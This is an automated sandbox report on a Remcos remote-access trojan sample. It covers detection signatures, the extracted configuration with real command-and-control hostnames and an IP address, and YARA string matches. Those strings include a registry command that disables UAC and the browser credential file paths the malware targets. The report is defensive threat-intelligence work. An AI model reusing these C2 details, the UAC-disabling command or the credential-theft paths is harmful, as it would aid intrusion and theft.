Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe

Overview

General Information

Sample name:17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe
Analysis ID:1535239
MD5:3904babb53d5bbdab7e0785a533a58d7
SHA1:ce1f658c4fec558cd65698c766363f06c876bdbd
SHA256:73710268628b6e68182c360fb53dc6475b31dacd9f46d05e98c0830019b075aa
Tags:base64-decodedexeuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Installs a global keyboard hook
Machine Learning detection for sample
Uses dynamic DNS services
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "embargogo237.duckdns.org:10521:1embargogo2377.duckdns.org:10522:0", "Assigned name": "COSTAUD", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "hhh-AQVE0Z", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeJoeSecurity_RemcosYara detected Remcos RATJoe Security
      17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x6aab8:$a1: Remcos restarted by watchdog!
        • 0x6b030:$a3: %02i:%02i:%02i:%03i
        17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeREMCOS_RAT_variantsunknownunknown
        • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
        • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x64b7c:$str_b2: Executing file:
        • 0x65bfc:$str_b3: GetDirectListeningPort
        • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x65728:$str_b7: \update.vbs
        • 0x64ba4:$str_b9: Downloaded file:
        • 0x64b90:$str_b10: Downloading file:
        • 0x64c34:$str_b12: Failed to upload file:
        • 0x65bc4:$str_b13: StartForward
        • 0x65be4:$str_b14: StopForward
        • 0x65680:$str_b15: fso.DeleteFile "
        • 0x65614:$str_b16: On Error Resume Next
        • 0x656b0:$str_b17: fso.DeleteFolder "
        • 0x64c24:$str_b18: Uploaded file:
        • 0x64be4:$str_b19: Unable to delete:
        • 0x65648:$str_b20: while fso.FileExists("
        • 0x650c1:$str_c0: [Firefox StoredLogins not found]
        Click to see the 1 entries

        Dropped Files

        SourceRuleDescriptionAuthorStrings
        C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000000.00000002.4629979476.00000000005DF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000000.00000002.4630392620.000000000222F000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              00000000.00000000.2175133172.0000000000459000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                00000000.00000000.2175133172.0000000000459000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  00000000.00000000.2175133172.0000000000459000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    Click to see the 10 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    0.2.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      0.2.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                        0.2.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                          0.2.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                          • 0x6aab8:$a1: Remcos restarted by watchdog!
                          • 0x6b030:$a3: %02i:%02i:%02i:%03i
                          0.2.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
                          • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
                          • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                          • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                          • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                          • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                          • 0x64b7c:$str_b2: Executing file:
                          • 0x65bfc:$str_b3: GetDirectListeningPort
                          • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                          • 0x65728:$str_b7: \update.vbs
                          • 0x64ba4:$str_b9: Downloaded file:
                          • 0x64b90:$str_b10: Downloading file:
                          • 0x64c34:$str_b12: Failed to upload file:
                          • 0x65bc4:$str_b13: StartForward
                          • 0x65be4:$str_b14: StopForward
                          • 0x65680:$str_b15: fso.DeleteFile "
                          • 0x65614:$str_b16: On Error Resume Next
                          • 0x656b0:$str_b17: fso.DeleteFolder "
                          • 0x64c24:$str_b18: Uploaded file:
                          • 0x64be4:$str_b19: Unable to delete:
                          • 0x65648:$str_b20: while fso.FileExists("
                          • 0x650c1:$str_c0: [Firefox StoredLogins not found]
                          Click to see the 7 entries

                          Sigma Signatures

                          Stealing of Sensitive Information

                          barindex
                          Sigma detected: Remcos
                          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, ProcessId: 1516, TargetFilename: C:\ProgramData\remcos\logs.dat

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-16T18:50:18.157431+020020365941Malware Command and Control Activity Detected192.168.2.54972094.103.125.19610521TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-16T18:50:20.385265+020028033043Unknown Traffic192.168.2.549725178.237.33.5080TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus / Scanner detection for submitted sample
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeAvira: detected
                          Found malware configuration
                          Source: 00000000.00000002.4629979476.00000000005AE000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "embargogo237.duckdns.org:10521:1embargogo2377.duckdns.org:10522:0", "Assigned name": "COSTAUD", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "hhh-AQVE0Z", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                          Multi AV Scanner detection for submitted file
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeReversingLabs: Detection: 84%
                          Yara detected Remcos RAT
                          Source: Yara matchFile source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.2.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.4629979476.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.4630392620.000000000222F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000000.2175133172.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.4629979476.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe PID: 1516, type: MEMORYSTR
                          Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Machine Learning detection for sample
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_004338C8
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_4bad6d9d-0

                          Exploits

                          barindex
                          Yara detected UAC Bypass using CMSTP
                          Source: Yara matchFile source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.2.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.2175133172.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe PID: 1516, type: MEMORYSTR

                          Privilege Escalation

                          barindex
                          Contains functionality to bypass UAC (CMSTPLUA)
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_00407538 _wcslen,CoGetObject,0_2_00407538
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_0040928E
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,0_2_0041C322
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,0_2_0040C388
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_004096A0
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,0_2_00408847
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_00407877 FindFirstFileW,FindNextFileW,0_2_00407877
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0044E8F9 FindFirstFileExA,0_2_0044E8F9
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_0040BB6B
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_00419B86
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_0040BD72
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_00407CD2

                          Networking

                          barindex
                          Suricata IDS alerts for network traffic
                          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49720 -> 94.103.125.196:10521
                          C2 URLs / IPs found in malware configuration
                          Source: Malware configuration extractorURLs: embargogo237.duckdns.org
                          Uses dynamic DNS services
                          Source: unknownDNS query: name: embargogo237.duckdns.org
                          Source: global trafficTCP traffic: 192.168.2.5:49720 -> 94.103.125.196:10521
                          Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                          Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                          Source: Joe Sandbox ViewASN Name: KWAOOK-NETSARLFR KWAOOK-NETSARLFR
                          Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49725 -> 178.237.33.50:80
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_0041B411
                          Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                          Source: global trafficDNS traffic detected: DNS query: embargogo237.duckdns.org
                          Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000003.2216085363.000000000061F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000003.2216085363.00000000005F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000003.2216085363.00000000005F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp%
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeString found in binary or memory: http://geoplugin.net/json.gp/C
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000003.2216085363.00000000005F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp6
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000003.2216085363.00000000005F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpU_
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000003.2216085363.00000000005F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpX

                          Key, Mouse, Clipboard, Microphone and Screen Capturing

                          barindex
                          Contains functionality to register a low level keyboard hook
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,000000000_2_0040A2F3
                          Installs a global keyboard hook
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,0_2_0040B749
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004168FC
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,0_2_0040B749
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,0_2_0040A41B
                          Source: Yara matchFile source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.2.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.2175133172.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe PID: 1516, type: MEMORYSTR

                          E-Banking Fraud

                          barindex
                          Yara detected Remcos RAT
                          Source: Yara matchFile source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.2.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.4629979476.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.4630392620.000000000222F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000000.2175133172.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.4629979476.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe PID: 1516, type: MEMORYSTR
                          Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                          Spam, unwanted Advertisements and Ransom Demands

                          barindex
                          Contains functionalty to change the wallpaper
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0041CA73 SystemParametersInfoW,0_2_0041CA73

                          System Summary

                          barindex
                          Malicious sample detected (through community Yara rule)
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, type: SAMPLEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, type: SAMPLEMatched rule: REMCOS_RAT_variants Author: unknown
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, type: SAMPLEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 0.2.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: 0.2.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
